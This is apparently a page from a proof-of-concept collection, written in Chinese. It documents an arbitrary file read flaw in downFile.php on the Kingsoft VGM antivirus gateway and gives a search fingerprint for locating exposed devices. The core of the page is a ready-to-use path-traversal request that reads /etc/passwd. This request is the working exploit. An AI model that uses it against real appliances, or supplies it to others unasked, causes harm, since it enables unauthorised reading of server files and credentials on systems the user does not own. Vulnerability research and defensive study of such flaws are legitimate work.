Awesome-POC/网络设备漏洞/金山 VGM防毒墙 downFile.php 任意文件读取漏洞.md
2024-11-06 14:10:36 +08:00

31 lines
542 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 金山 VGM防毒墙 downFile.php 任意文件读取漏洞
## 漏洞描述
金山 VGM防毒墙 downFile.php文件存在任意文件读取漏洞攻击者通过漏洞可以获取服务器任意文件
## 漏洞影响
```
金山 VGM防毒墙
```
## 网络测绘
```
"金山VGM"
```
## 漏洞复现
登录页面
![image-20230314090419140](images/image-20230314090419140.png)
验证POC
```
/downFile.php?filename=../../../../etc/passwd
```
![image-20230314090430563](images/image-20230314090430563.png)